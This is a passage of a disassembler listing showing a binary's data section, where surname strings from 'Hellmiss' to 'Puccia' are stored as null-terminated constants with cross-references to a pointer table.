aHellmiss db 'Hellmiss',0 ; DATA XREF: .data:00445B00�o
align 4
aHelprin db 'Helprin',0 ; DATA XREF: .data:00445B04�o
aHemphill db 'Hemphill',0 ; DATA XREF: .data:00445B08�o
align 4
aHenery db 'Henery',0 ; DATA XREF: .data:00445B0C�o
align 4
aHenrichs db 'Henrichs',0 ; DATA XREF: .data:00445B10�o
align 10h
aHernandez db 'Hernandez',0 ; DATA XREF: .data:00445B14�o
align 4
aHerrera db 'Herrera',0 ; DATA XREF: .data:00445B18�o
aHester db 'Hester',0 ; DATA XREF: .data:00445B1C�o
align 4
aHeubert db 'Heubert',0 ; DATA XREF: .data:00445B20�o
aHeyeck db 'Heyeck',0 ; DATA XREF: .data:00445B24�o
align 4
aHimmelfarb db 'Himmelfarb',0 ; DATA XREF: .data:00445B28�o
align 4
aHind db 'Hind',0 ; DATA XREF: .data:00445B2C�o
align 10h
aHirst db 'Hirst',0 ; DATA XREF: .data:00445B30�o
align 4
aHitchcock db 'Hitchcock',0 ; DATA XREF: .data:00445B34�o
align 4
aHoang db 'Hoang',0 ; DATA XREF: .data:00445B38�o
align 4
aHock db 'Hock',0 ; DATA XREF: .data:00445B3C�o
align 4
aHoffer db 'Hoffer',0 ; DATA XREF: .data:00445B40�o
align 4
aHoffman db 'Hoffman',0 ; DATA XREF: .data:00445B44�o
aHokanson db 'Hokanson',0 ; DATA XREF: .data:00445B48�o
align 10h
aHokoda db 'Hokoda',0 ; DATA XREF: .data:00445B4C�o
align 4
aHolmes db 'Holmes',0 ; DATA XREF: .data:00445B50�o
align 10h
aHoloien db 'Holoien',0 ; DATA XREF: .data:00445B54�o
aHolter db 'Holter',0 ; DATA XREF: .data:00445B58�o
align 10h
aHolway db 'Holway',0 ; DATA XREF: .data:00445B5C�o
align 4
aHolzman db 'Holzman',0 ; DATA XREF: .data:00445B60�o
aHooker db 'Hooker',0 ; DATA XREF: .data:00445B64�o
align 4
aHopkins db 'Hopkins',0 ; DATA XREF: .data:00445B68�o
aHorsley db 'Horsley',0 ; DATA XREF: .data:00445B6C�o
aHoshida db 'Hoshida',0 ; DATA XREF: .data:00445B70�o
aHostage db 'Hostage',0 ; DATA XREF: .data:00445B74�o
aHottle db 'Hottle',0 ; DATA XREF: .data:00445B78�o
align 10h
aHoward db 'Howard',0 ; DATA XREF: .data:00445B7C�o
align 4
aHoy db 'Hoy',0 ; DATA XREF: .data:00445B80�o
aHuey db 'Huey',0 ; DATA XREF: .data:00445B84�o
align 4
aHuidekoper db 'Huidekoper',0 ; DATA XREF: .data:00445B88�o
align 10h
aHungerford db 'Hungerford',0 ; DATA XREF: .data:00445B8C�o
align 4
aHuntington db 'Huntington',0 ; DATA XREF: .data:00445B90�o
align 4
aHupp db 'Hupp',0 ; DATA XREF: .data:00445B94�o
align 10h
aHurtubise db 'Hurtubise',0 ; DATA XREF: .data:00445B98�o
align 4
aHutchings db 'Hutchings',0 ; DATA XREF: .data:00445B9C�o
align 4
aHyde db 'Hyde',0 ; DATA XREF: .data:00445BA0�o
align 10h
aIaquinta db 'Iaquinta',0 ; DATA XREF: .data:00445BA4�o
align 4
aIchikawa db 'Ichikawa',0 ; DATA XREF: .data:00445BA8�o
align 4
aIgarashi db 'Igarashi',0 ; DATA XREF: .data:00445BAC�o
align 4
aInamura db 'Inamura',0 ; DATA XREF: .data:00445BB0�o
aInniss db 'Inniss',0 ; DATA XREF: .data:00445BB4�o
align 4
aIsaac db 'Isaac',0 ; DATA XREF: .data:00445BB8�o
align 4
aIsaievych db 'Isaievych',0 ; DATA XREF: .data:00445BBC�o
align 4
aIsbill db 'Isbill',0 ; DATA XREF: .data:00445BC0�o
align 10h
aIsserman db 'Isserman',0 ; DATA XREF: .data:00445BC4�o
align 4
aIyer db 'Iyer',0 ; DATA XREF: .data:00445BC8�o
align 4
aJacenko db 'Jacenko',0 ; DATA XREF: .data:00445BCC�o
aJackson db 'Jackson',0 ; DATA XREF: .data:00445BD0�o
aJagers db 'Jagers',0 ; DATA XREF: .data:00445BD4�o
align 4
aJagger db 'Jagger',0 ; DATA XREF: .data:00445BD8�o
align 4
aJagoe db 'Jagoe',0 ; DATA XREF: .data:00445BDC�o
align 4
aJain db 'Jain',0 ; DATA XREF: .data:00445BE0�o
align 4
aJamil db 'Jamil',0 ; DATA XREF: .data:00445BE4�o
align 4
aJanjigian db 'Janjigian',0 ; DATA XREF: .data:00445BE8�o
align 4
aJarnagin db 'Jarnagin',0 ; DATA XREF: .data:00445BEC�o
align 4
aJarrell db 'Jarrell',0 ; DATA XREF: .data:00445BF0�o
aJay db 'Jay',0 ; DATA XREF: .data:00445BF4�o
aJeffers db 'Jeffers',0 ; DATA XREF: .data:00445BF8�o
aJellis db 'Jellis',0 ; DATA XREF: .data:00445BFC�o
align 10h
aJenkins db 'Jenkins',0 ; DATA XREF: .data:00445C00�o
aJespersen db 'Jespersen',0 ; DATA XREF: .data:00445C04�o
align 4
aJewett db 'Jewett',0 ; DATA XREF: .data:00445C08�o
align 4
aJohannesson db 'Johannesson',0 ; DATA XREF: .data:00445C0C�o
aJohannsen db 'Johannsen',0 ; DATA XREF: .data:00445C10�o
align 4
aJohns db 'Johns',0 ; DATA XREF: .data:00445C14�o
align 4
aJolly db 'Jolly',0 ; DATA XREF: .data:00445C18�o
align 4
aJorgensen db 'Jorgensen',0 ; DATA XREF: .data:00445C1C�o
align 10h
aJucks db 'Jucks',0 ; DATA XREF: .data:00445C20�o
align 4
aJuliano db 'Juliano',0 ; DATA XREF: .data:00445C24�o
aJulious db 'Julious',0 ; DATA XREF: .data:00445C28�o
aKabbash db 'Kabbash',0 ; DATA XREF: .data:00445C2C�o
aKaboolian db 'Kaboolian',0 ; DATA XREF: .data:00445C30�o
align 4
aKafadar db 'Kafadar',0 ; DATA XREF: .data:00445C34�o
aKalbfleisch db 'Kalbfleisch',0 ; DATA XREF: .data:00445C38�o
aKaligian db 'Kaligian',0 ; DATA XREF: .data:00445C3C�o
align 4
aKalil db 'Kalil',0 ; DATA XREF: .data:00445C40�o
align 4
aKalinowski db 'Kalinowski',0 ; DATA XREF: .data:00445C44�o
align 10h
aKalman db 'Kalman',0 ; DATA XREF: .data:00445C48�o
align 4
aKamel db 'Kamel',0 ; DATA XREF: .data:00445C4C�o
align 10h
aKangis db 'Kangis',0 ; DATA XREF: .data:00445C50�o
align 4
aKarpouzes db 'Karpouzes',0 ; DATA XREF: .data:00445C54�o
align 4
aKassower db 'Kassower',0 ; DATA XREF: .data:00445C58�o
align 10h
aKasten db 'Kasten',0 ; DATA XREF: .data:00445C5C�o
align 4
aKawachi db 'Kawachi',0 ; DATA XREF: .data:00445C60�o
aKee db 'Kee',0 ; DATA XREF: .data:00445C64�o
aKeenan db 'Keenan',0 ; DATA XREF: .data:00445C68�o
align 4
aKeepper db 'Keepper',0 ; DATA XREF: .data:00445C6C�o
aKeith db 'Keith',0 ; DATA XREF: .data:00445C70�o
align 4
aKelker db 'Kelker',0 ; DATA XREF: .data:00445C74�o
align 4
aKelsey db 'Kelsey',0 ; DATA XREF: .data:00445C78�o
align 4
aKempton db 'Kempton',0 ; DATA XREF: .data:00445C7C�o
aKemsley db 'Kemsley',0 ; DATA XREF: .data:00445C80�o
aKendall db 'Kendall',0 ; DATA XREF: .data:00445C84�o
aKerry db 'Kerry',0 ; DATA XREF: .data:00445C88�o
align 4
aKeul db 'Keul',0 ; DATA XREF: .data:00445C8C�o
align 4
aKhong db 'Khong',0 ; DATA XREF: .data:00445C90�o
align 4
aKimmel db 'Kimmel',0 ; DATA XREF: .data:00445C94�o
align 4
aKimmett db 'Kimmett',0 ; DATA XREF: .data:00445C98�o
aKimura db 'Kimura',0 ; DATA XREF: .data:00445C9C�o
align 4
aKindall db 'Kindall',0 ; DATA XREF: .data:00445CA0�o
aKinsley db 'Kinsley',0 ; DATA XREF: .data:00445CA4�o
aKippenberger db 'Kippenberger',0 ; DATA XREF: .data:00445CA8�o
align 4
aKirscht db 'Kirscht',0 ; DATA XREF: .data:00445CAC�o
aKittridge db 'Kittridge',0 ; DATA XREF: .data:00445CB0�o
align 4
aKleckner db 'Kleckner',0 ; DATA XREF: .data:00445CB4�o
align 4
aKleiman db 'Kleiman',0 ; DATA XREF: .data:00445CB8�o
aKleinfelder db 'Kleinfelder',0 ; DATA XREF: .data:00445CBC�o
aKlemperer db 'Klemperer',0 ; DATA XREF: .data:00445CC0�o
align 4
aKling db 'Kling',0 ; DATA XREF: .data:00445CC4�o
align 4
aKlinkenborg db 'Klinkenborg',0 ; DATA XREF: .data:00445CC8�o
aKlint db 'Klint',0 ; DATA XREF: .data:00445CCC�o
align 10h
aKnuff db 'Knuff',0 ; DATA XREF: .data:00445CD0�o
align 4
aKobrick db 'Kobrick',0 ; DATA XREF: .data:00445CD4�o
aKoch db 'Koch',0 ; DATA XREF: .data:00445CD8�o
align 4
aKohn db 'Kohn',0 ; DATA XREF: .data:00445CDC�o
align 10h
aKoivumaki db 'Koivumaki',0 ; DATA XREF: .data:00445CE0�o
align 4
aKommer db 'Kommer',0 ; DATA XREF: .data:00445CE4�o
align 4
aKoniaris db 'Koniaris',0 ; DATA XREF: .data:00445CE8�o
align 10h
aKonrad db 'Konrad',0 ; DATA XREF: .data:00445CEC�o
align 4
aKool db 'Kool',0 ; DATA XREF: .data:00445CF0�o
align 10h
aKorzybski db 'Korzybski',0 ; DATA XREF: .data:00445CF4�o
align 4
aKotter db 'Kotter',0 ; DATA XREF: .data:00445CF8�o
align 4
aKovaks db 'Kovaks',0 ; DATA XREF: .data:00445CFC�o
align 4
aKraemer db 'Kraemer',0 ; DATA XREF: .data:00445D00�o
aKrailo db 'Krailo',0 ; DATA XREF: .data:00445D04�o
align 4
aKrasney db 'Krasney',0 ; DATA XREF: .data:00445D08�o
aKraus db 'Kraus',0 ; DATA XREF: .data:00445D0C�o
align 4
aKroemer db 'Kroemer',0 ; DATA XREF: .data:00445D10�o
aKrysiak db 'Krysiak',0 ; DATA XREF: .data:00445D14�o
aKuenzli db 'Kuenzli',0 ; DATA XREF: .data:00445D18�o
aKumar db 'Kumar',0 ; DATA XREF: .data:00445D1C�o
align 4
aKusman db 'Kusman',0 ; DATA XREF: .data:00445D20�o
align 4
aKuwabara db 'Kuwabara',0 ; DATA XREF: .data:00445D24�o
align 10h
aLa db 'La',0 ; DATA XREF: .data:00445D28�o
align 4
aLabunka db 'Labunka',0 ; DATA XREF: .data:00445D2C�o
aLafler db 'Lafler',0 ; DATA XREF: .data:00445D30�o
align 4
aLaing db 'Laing',0 ; DATA XREF: .data:00445D34�o
align 4
aLallemant db 'Lallemant',0 ; DATA XREF: .data:00445D38�o
align 4
aLandes db 'Landes',0 ; DATA XREF: .data:00445D3C�o
align 10h
aLankes db 'Lankes',0 ; DATA XREF: .data:00445D40�o
align 4
aLantieri db 'Lantieri',0 ; DATA XREF: .data:00445D44�o
align 4
aLanzit db 'Lanzit',0 ; DATA XREF: .data:00445D48�o
align 4
aLaserna db 'Laserna',0 ; DATA XREF: .data:00445D4C�o
aLashley db 'Lashley',0 ; DATA XREF: .data:00445D50�o
aLawless db 'Lawless',0 ; DATA XREF: .data:00445D54�o
aLecar db 'Lecar',0 ; DATA XREF: .data:00445D58�o
align 4
aLecce db 'Lecce',0 ; DATA XREF: .data:00445D5C�o
align 4
aLeclercq db 'Leclercq',0 ; DATA XREF: .data:00445D60�o
align 10h
aLeite db 'Leite',0 ; DATA XREF: .data:00445D64�o
align 4
aLenard db 'Lenard',0 ; DATA XREF: .data:00445D68�o
align 10h
aLEnclos db 'l',27h,'Enclos',0 ; DATA XREF: .data:00445D6C�o
align 4
aLesser db 'Lesser',0 ; DATA XREF: .data:00445D70�o
align 4
aLessi db 'Lessi',0 ; DATA XREF: .data:00445D74�o
align 4
aLiakos db 'Liakos',0 ; DATA XREF: .data:00445D78�o
align 4
aLidano db 'Lidano',0 ; DATA XREF: .data:00445D7C�o
align 4
aLiem db 'Liem',0 ; DATA XREF: .data:00445D80�o
align 4
aLight db 'Light',0 ; DATA XREF: .data:00445D84�o
align 4
aLightfoot db 'Lightfoot',0 ; DATA XREF: .data:00445D88�o
align 4
aLim db 'Lim',0 ; DATA XREF: .data:00445D8C�o
aLinares db 'Linares',0 ; DATA XREF: .data:00445D90�o
aLinda db 'Linda',0 ; DATA XREF: .data:00445D94�o
align 4
aLinder db 'Linder',0 ; DATA XREF: .data:00445D98�o
align 4
aLine_0 db 'Line',0 ; DATA XREF: .data:00445D9C�o
align 4
aLinehan db 'Linehan',0 ; DATA XREF: .data:00445DA0�o
aLinzee db 'Linzee',0 ; DATA XREF: .data:00445DA4�o
align 4
aLippmann db 'Lippmann',0 ; DATA XREF: .data:00445DA8�o
align 4
aLipponen db 'Lipponen',0 ; DATA XREF: .data:00445DAC�o
align 4
aLittle db 'Little',0 ; DATA XREF: .data:00445DB0�o
align 4
aLitvak db 'Litvak',0 ; DATA XREF: .data:00445DB4�o
align 4
aLivernash db 'Livernash',0 ; DATA XREF: .data:00445DB8�o
align 10h
aLivi db 'Livi',0 ; DATA XREF: .data:00445DBC�o
align 4
aLivolsi db 'Livolsi',0 ; DATA XREF: .data:00445DC0�o
aLizardo db 'Lizardo',0 ; DATA XREF: .data:00445DC4�o
aLocatelli db 'Locatelli',0 ; DATA XREF: .data:00445DC8�o
align 4
aLongworth db 'Longworth',0 ; DATA XREF: .data:00445DCC�o
align 10h
aLoss db 'Loss',0 ; DATA XREF: .data:00445DD0�o
align 4
aLoveman db 'Loveman',0 ; DATA XREF: .data:00445DD4�o
aLowenstein db 'Lowenstein',0 ; DATA XREF: .data:00445DD8�o
align 4
aLoza db 'Loza',0 ; DATA XREF: .data:00445DDC�o
align 4
aLubin db 'Lubin',0 ; DATA XREF: .data:00445DE0�o
align 4
aLucas db 'Lucas',0 ; DATA XREF: .data:00445DE4�o
align 4
aLuciano db 'Luciano',0 ; DATA XREF: .data:00445DE8�o
aLuczkow db 'Luczkow',0 ; DATA XREF: .data:00445DEC�o
aLuecke db 'Luecke',0 ; DATA XREF: .data:00445DF0�o
align 4
aLunetta db 'Lunetta',0 ; DATA XREF: .data:00445DF4�o
aLuoma db 'Luoma',0 ; DATA XREF: .data:00445DF8�o
align 4
aLussier db 'Lussier',0 ; DATA XREF: .data:00445DFC�o
aLutcavage db 'Lutcavage',0 ; DATA XREF: .data:00445E00�o
align 10h
aLuzader db 'Luzader',0 ; DATA XREF: .data:00445E04�o
aMa db 'Ma',0 ; DATA XREF: .data:00445E08�o
align 4
aMaccormac db 'Maccormac',0 ; DATA XREF: .data:00445E0C�o
align 4
aMacdonald db 'Macdonald',0 ; DATA XREF: .data:00445E10�o
align 4
aMaceachern db 'Maceachern',0 ; DATA XREF: .data:00445E14�o
align 10h
aMacintyre db 'Macintyre',0 ; DATA XREF: .data:00445E18�o
align 4
aMackenney db 'Mackenney',0 ; DATA XREF: .data:00445E1C�o
align 4
aMacmillan db 'MacMillan',0 ; DATA XREF: .data:00445E20�o
align 4
aMacy db 'Macy',0 ; DATA XREF: .data:00445E24�o
align 4
aMadigan db 'Madigan',0 ; DATA XREF: .data:00445E28�o
aMaggio db 'Maggio',0 ; DATA XREF: .data:00445E2C�o
align 4
aMahony db 'Mahony',0 ; DATA XREF: .data:00445E30�o
align 4
aMaier db 'Maier',0 ; DATA XREF: .data:00445E34�o
align 4
aMaineHershey db 'Maine-Hershey',0 ; DATA XREF: .data:00445E38�o
align 4
aMaisano db 'Maisano',0 ; DATA XREF: .data:00445E3C�o
aMalatesta db 'Malatesta',0 ; DATA XREF: .data:00445E40�o
align 10h
aMaller db 'Maller',0 ; DATA XREF: .data:00445E44�o
align 4
aMalova db 'Malova',0 ; DATA XREF: .data:00445E48�o
align 10h
aManalis db 'Manalis',0 ; DATA XREF: .data:00445E4C�o
aMandel db 'Mandel',0 ; DATA XREF: .data:00445E50�o
align 10h
aManganiello db 'Manganiello',0 ; DATA XREF: .data:00445E54�o
aMantovan db 'Mantovan',0 ; DATA XREF: .data:00445E58�o
align 4
aMarch_0 db 'March',0 ; DATA XREF: .data:00445E5C�o
align 10h
aMarchbanks db 'Marchbanks',0 ; DATA XREF: .data:00445E60�o
align 4
aMarcus db 'Marcus',0 ; DATA XREF: .data:00445E64�o
align 4
aMargalit db 'Margalit',0 ; DATA XREF: .data:00445E68�o
align 10h
aMargetts db 'Margetts',0 ; DATA XREF: .data:00445E6C�o
align 4
aMarques db 'Marques',0 ; DATA XREF: .data:00445E70�o
aMartinez db 'Martinez',0 ; DATA XREF: .data:00445E74�o
align 10h
aMartochio db 'Martochio',0 ; DATA XREF: .data:00445E78�o
align 4
aMarton db 'Marton',0 ; DATA XREF: .data:00445E7C�o
align 4
aMarubini db 'Marubini',0 ; DATA XREF: .data:00445E80�o
align 10h
aMass db 'Mass',0 ; DATA XREF: .data:00445E84�o
align 4
aMatalka db 'Matalka',0 ; DATA XREF: .data:00445E88�o
aMatarazzo db 'Matarazzo',0 ; DATA XREF: .data:00445E8C�o
align 4
aMatsukata db 'Matsukata',0 ; DATA XREF: .data:00445E90�o
align 4
aMattson db 'Mattson',0 ; DATA XREF: .data:00445E94�o
aMauzy db 'Mauzy',0 ; DATA XREF: .data:00445E98�o
align 4
aMay_0 db 'May',0 ; DATA XREF: .data:00445E9C�o
aMazzali db 'Mazzali',0 ; DATA XREF: .data:00445EA0�o
aMazziotta db 'Mazziotta',0 ; DATA XREF: .data:00445EA4�o
align 10h
aMcbride db 'Mcbride',0 ; DATA XREF: .data:00445EA8�o
aMccaffery db 'Mccaffery',0 ; DATA XREF: .data:00445EAC�o
align 4
aMccall db 'Mccall',0 ; DATA XREF: .data:00445EB0�o
align 4
aMcclearn db 'Mcclearn',0 ; DATA XREF: .data:00445EB4�o
align 4
aMcdowell db 'Mcdowell',0 ; DATA XREF: .data:00445EB8�o
align 4
aMcelroy db 'Mcelroy',0 ; DATA XREF: .data:00445EBC�o
aMcfadden db 'McFadden',0 ; DATA XREF: .data:00445EC0�o
align 4
aMcghee db 'Mcghee',0 ; DATA XREF: .data:00445EC4�o
align 10h
aMcgoldrick db 'Mcgoldrick',0 ; DATA XREF: .data:00445EC8�o
align 4
aMcilroy db 'McIlroy',0 ; DATA XREF: .data:00445ECC�o
aMcintosh db 'Mcintosh',0 ; DATA XREF: .data:00445ED0�o
align 10h
aMckenna db 'Mckenna',0 ; DATA XREF: .data:00445ED4�o
aMclane db 'Mclane',0 ; DATA XREF: .data:00445ED8�o
align 10h
aMclaren db 'Mclaren',0 ; DATA XREF: .data:00445EDC�o
aMcnealy db 'Mcnealy',0 ; DATA XREF: .data:00445EE0�o
aMcnulty db 'Mcnulty',0 ; DATA XREF: .data:00445EE4�o
aMeccariello db 'Meccariello',0 ; DATA XREF: .data:00445EE8�o
aMemisoglu db 'Memisoglu',0 ; DATA XREF: .data:00445EEC�o
align 10h
aMenzies db 'Menzies',0 ; DATA XREF: .data:00445EF0�o
aMerikoski db 'Merikoski',0 ; DATA XREF: .data:00445EF4�o
align 4
aMerlani db 'Merlani',0 ; DATA XREF: .data:00445EF8�o
aMerminod db 'Merminod',0 ; DATA XREF: .data:00445EFC�o
align 4
aMerseth db 'Merseth',0 ; DATA XREF: .data:00445F00�o
aMerz db 'Merz',0 ; DATA XREF: .data:00445F04�o
align 4
aMetelka db 'Metelka',0 ; DATA XREF: .data:00445F08�o
aMetropolis db 'Metropolis',0 ; DATA XREF: .data:00445F0C�o
align 4
aMeurer db 'Meurer',0 ; DATA XREF: .data:00445F10�o
align 4
aMichelman db 'Michelman',0 ; DATA XREF: .data:00445F14�o
align 10h
aMiddle db 'Middle',0 ; DATA XREF: .data:00445F18�o
align 4
aMieher db 'Mieher',0 ; DATA XREF: .data:00445F1C�o
align 10h
aMills db 'Mills',0 ; DATA XREF: .data:00445F20�o
align 4
aMinh db 'Minh',0 ; DATA XREF: .data:00445F24�o
align 10h
aMini db 'Mini',0 ; DATA XREF: .data:00445F28�o
align 4
aMinichiello db 'Minichiello',0 ; DATA XREF: .data:00445F2C�o
aGonzalez db 'Gonzalez',0 ; DATA XREF: .data:00445F30�o
align 10h
aMitropoulos db 'Mitropoulos',0 ; DATA XREF: .data:00445F34�o
aMittal db 'Mittal',0 ; DATA XREF: .data:00445F38�o
align 4
aMocroft db 'Mocroft',0 ; DATA XREF: .data:00445F3C�o
aModestino db 'Modestino',0 ; DATA XREF: .data:00445F40�o
align 4
aMoeller db 'Moeller',0 ; DATA XREF: .data:00445F44�o
aMohr db 'Mohr',0 ; DATA XREF: .data:00445F48�o
align 4
aMoiamedi db 'Moiamedi',0 ; DATA XREF: .data:00445F4C�o
align 4
aMonque db 'Monque',0 ; DATA XREF: .data:00445F50�o
align 4
aMontilio db 'Montilio',0 ; DATA XREF: .data:00445F54�o
align 4
aMooredech_ db 'MooreDeCh.',0 ; DATA XREF: .data:00445F58�o
align 4
aMorani db 'Morani',0 ; DATA XREF: .data:00445F5C�o
align 4
aMoreton db 'Moreton',0 ; DATA XREF: .data:00445F60�o
aMorrison db 'Morrison',0 ; DATA XREF: .data:00445F64�o
align 10h
aMorrow db 'Morrow',0 ; DATA XREF: .data:00445F68�o
align 4
aMortimer db 'Mortimer',0 ; DATA XREF: .data:00445F6C�o
align 4
aMosher db 'Mosher',0 ; DATA XREF: .data:00445F70�o
align 4
aMosler db 'Mosler',0 ; DATA XREF: .data:00445F74�o
align 4
aMostafavi db 'Mostafavi',0 ; DATA XREF: .data:00445F78�o
align 10h
aMotooka db 'Motooka',0 ; DATA XREF: .data:00445F7C�o
aMudarri db 'Mudarri',0 ; DATA XREF: .data:00445F80�o
aMuello db 'Muello',0 ; DATA XREF: .data:00445F84�o
align 4
aMugnai db 'Mugnai',0 ; DATA XREF: .data:00445F88�o
align 10h
aMulkern db 'Mulkern',0 ; DATA XREF: .data:00445F8C�o
aMulroy db 'Mulroy',0 ; DATA XREF: .data:00445F90�o
align 10h
aMumford db 'Mumford',0 ; DATA XREF: .data:00445F94�o
aMussachio db 'Mussachio',0 ; DATA XREF: .data:00445F98�o
align 4
aNaddeo db 'Naddeo',0 ; DATA XREF: .data:00445F9C�o
align 4
aNapolitano db 'Napolitano',0 ; DATA XREF: .data:00445FA0�o
align 4
aNardi db 'Nardi',0 ; DATA XREF: .data:00445FA4�o
align 10h
aNardone db 'Nardone',0 ; DATA XREF: .data:00445FA8�o
aNaviaux db 'Naviaux',0 ; DATA XREF: .data:00445FAC�o
aNayduch db 'Nayduch',0 ; DATA XREF: .data:00445FB0�o
aNelson db 'Nelson',0 ; DATA XREF: .data:00445FB4�o
align 10h
aNenna db 'Nenna',0 ; DATA XREF: .data:00445FB8�o
align 4
aNesci db 'Nesci',0 ; DATA XREF: .data:00445FBC�o
align 10h
aNeuman db 'Neuman',0 ; DATA XREF: .data:00445FC0�o
align 4
aNewfeld db 'Newfeld',0 ; DATA XREF: .data:00445FC4�o
aNewlin db 'Newlin',0 ; DATA XREF: .data:00445FC8�o
align 4
aNg db 'Ng',0 ; DATA XREF: .data:00445FCC�o
align 4
aNi_0 db 'Ni',0 ; DATA XREF: .data:00445FD0�o
align 10h
aNickerson db 'Nickerson',0 ; DATA XREF: .data:00445FD4�o
align 4
aNickoloff db 'Nickoloff',0 ; DATA XREF: .data:00445FD8�o
align 4
aNisenson db 'Nisenson',0 ; DATA XREF: .data:00445FDC�o
align 4
aNitabach db 'Nitabach',0 ; DATA XREF: .data:00445FE0�o
align 10h
aNotman db 'Notman',0 ; DATA XREF: .data:00445FE4�o
align 4
aNuzum db 'Nuzum',0 ; DATA XREF: .data:00445FE8�o
align 10h
aOcougne db 'Ocougne',0 ; DATA XREF: .data:00445FEC�o
aOgata db 'Ogata',0 ; DATA XREF: .data:00445FF0�o
align 10h
aOh db 'Oh',0 ; DATA XREF: .data:00445FF4�o
align 4
aOHagan db 'O',27h,'hagan',0 ; DATA XREF: .data:00445FF8�o
aOldford db 'Oldford',0 ; DATA XREF: .data:00445FFC�o
aOlsen db 'Olsen',0 ; DATA XREF: .data:00446000�o
align 4
aOlson db 'Olson',0 ; DATA XREF: .data:00446004�o
align 4
aOlszewski db 'Olszewski',0 ; DATA XREF: .data:00446008�o
align 10h
aOMalley db 'O',27h,'malley',0 ; DATA XREF: .data:0044600C�o
align 4
aOman db 'Oman',0 ; DATA XREF: .data:00446010�o
align 4
aOMeara db 'O',27h,'meara',0 ; DATA XREF: .data:00446014�o
aOpel db 'Opel',0 ; DATA XREF: .data:00446018�o
align 4
aOray db 'Oray',0 ; DATA XREF: .data:0044601C�o
align 4
aOrfield db 'Orfield',0 ; DATA XREF: .data:00446020�o
aOrsi db 'Orsi',0 ; DATA XREF: .data:00446024�o
align 4
aOspina db 'Ospina',0 ; DATA XREF: .data:00446028�o
align 4
aOstrowski db 'Ostrowski',0 ; DATA XREF: .data:0044602C�o
align 10h
aOttaviani db 'Ottaviani',0 ; DATA XREF: .data:00446030�o
align 4
aOtten db 'Otten',0 ; DATA XREF: .data:00446034�o
align 4
aOuchida db 'Ouchida',0 ; DATA XREF: .data:00446038�o
aOvid db 'Ovid',0 ; DATA XREF: .data:0044603C�o
align 4
aPaesdealmeida db 'PaesDealmeida',0 ; DATA XREF: .data:00446040�o
align 4
aPaine db 'Paine',0 ; DATA XREF: .data:00446044�o
align 4
aPalayoor db 'Palayoor',0 ; DATA XREF: .data:00446048�o
align 4
aPalepu db 'Palepu',0 ; DATA XREF: .data:0044604C�o
align 10h
aPallara db 'Pallara',0 ; DATA XREF: .data:00446050�o
aPalmitesta db 'Palmitesta',0 ; DATA XREF: .data:00446054�o
align 4
aPanadero db 'Panadero',0 ; DATA XREF: .data:00446058�o
align 10h
aPanizzon db 'Panizzon',0 ; DATA XREF: .data:0044605C�o
align 4
aPantilla db 'Pantilla',0 ; DATA XREF: .data:00446060�o
align 4
aPaoletti db 'Paoletti',0 ; DATA XREF: .data:00446064�o
align 4
aParmeggiani db 'Parmeggiani',0 ; DATA XREF: .data:00446068�o
aParris db 'Parris',0 ; DATA XREF: .data:0044606C�o
align 4
aPartridge db 'Partridge',0 ; DATA XREF: .data:00446070�o
align 4
aPascucci db 'Pascucci',0 ; DATA XREF: .data:00446074�o
align 10h
aPatefield db 'Patefield',0 ; DATA XREF: .data:00446078�o
align 4
aPatrick db 'Patrick',0 ; DATA XREF: .data:0044607C�o
aPattullo db 'Pattullo',0 ; DATA XREF: .data:00446080�o
align 10h
aPavetti db 'Pavetti',0 ; DATA XREF: .data:00446084�o
aPavlon db 'Pavlon',0 ; DATA XREF: .data:00446088�o
align 10h
aPawloski db 'Pawloski',0 ; DATA XREF: .data:0044608C�o
align 4
aPaynter db 'Paynter',0 ; DATA XREF: .data:00446090�o
aPeabody db 'Peabody',0 ; DATA XREF: .data:00446094�o
aPearlberg db 'Pearlberg',0 ; DATA XREF: .data:00446098�o
align 4
aPederson db 'Pederson',0 ; DATA XREF: .data:0044609C�o
align 4
aPeishel db 'Peishel',0 ; DATA XREF: .data:004460A0�o
aPenny db 'Penny',0 ; DATA XREF: .data:004460A4�o
align 4
aPereira db 'Pereira',0 ; DATA XREF: .data:004460A8�o
aPerko db 'Perko',0 ; DATA XREF: .data:004460AC�o
align 4
aPerlak db 'Perlak',0 ; DATA XREF: .data:004460B0�o
align 4
aPerlman db 'Perlman',0 ; DATA XREF: .data:004460B4�o
aPerna db 'Perna',0 ; DATA XREF: .data:004460B8�o
align 4
aPerone db 'Perone',0 ; DATA XREF: .data:004460BC�o
align 4
aPerrimon db 'Perrimon',0 ; DATA XREF: .data:004460C0�o
align 10h
aPeters db 'Peters',0 ; DATA XREF: .data:004460C4�o
align 4
aPetruzello db 'Petruzello',0 ; DATA XREF: .data:004460C8�o
align 4
aPettibone db 'Pettibone',0 ; DATA XREF: .data:004460CC�o
align 10h
aPettit db 'Pettit',0 ; DATA XREF: .data:004460D0�o
align 4
aPfister db 'Pfister',0 ; DATA XREF: .data:004460D4�o
aPilbeam db 'Pilbeam',0 ; DATA XREF: .data:004460D8�o
aPinot db 'Pinot',0 ; DATA XREF: .data:004460DC�o
align 10h
aPlancon db 'Plancon',0 ; DATA XREF: .data:004460E0�o
aPlant db 'Plant',0 ; DATA XREF: .data:004460E4�o
align 10h
aPlasket db 'Plasket',0 ; DATA XREF: .data:004460E8�o
aPlous db 'Plous',0 ; DATA XREF: .data:004460EC�o
align 10h
aPo db 'Po',0 ; DATA XREF: .data:004460F0�o
align 4
aPocobene db 'Pocobene',0 ; DATA XREF: .data:004460F4�o
align 10h
aPoincaire db 'Poincaire',0 ; DATA XREF: .data:004460F8�o
align 4
aPointer db 'Pointer',0 ; DATA XREF: .data:004460FC�o
aPoirier db 'Poirier',0 ; DATA XREF: .data:00446100�o
aPolak db 'Polak',0 ; DATA XREF: .data:00446104�o
align 4
aPolanyi db 'Polanyi',0 ; DATA XREF: .data:00446108�o
aPolitis db 'Politis',0 ; DATA XREF: .data:0044610C�o
aPoma db 'Poma',0 ; DATA XREF: .data:00446110�o
align 4
aPoolman db 'Poolman',0 ; DATA XREF: .data:00446114�o
aPowers db 'Powers',0 ; DATA XREF: .data:00446118�o
align 4
aPresper db 'Presper',0 ; DATA XREF: .data:0044611C�o
aPreucel db 'Preucel',0 ; DATA XREF: .data:00446120�o
aPrevost db 'Prevost',0 ; DATA XREF: .data:00446124�o
aPritchard db 'Pritchard',0 ; DATA XREF: .data:00446128�o
align 10h
aPritz db 'Pritz',0 ; DATA XREF: .data:0044612C�o
align 4
aProietti db 'Proietti',0 ; DATA XREF: .data:00446130�o
align 4
aProthrowStith db 'Prothrow-Stith',0 ; DATA XREF: .data:00446134�o
align 4
aPuccia db 'Puccia',0 ; DATA XREF: .data:00446138�o
align 4
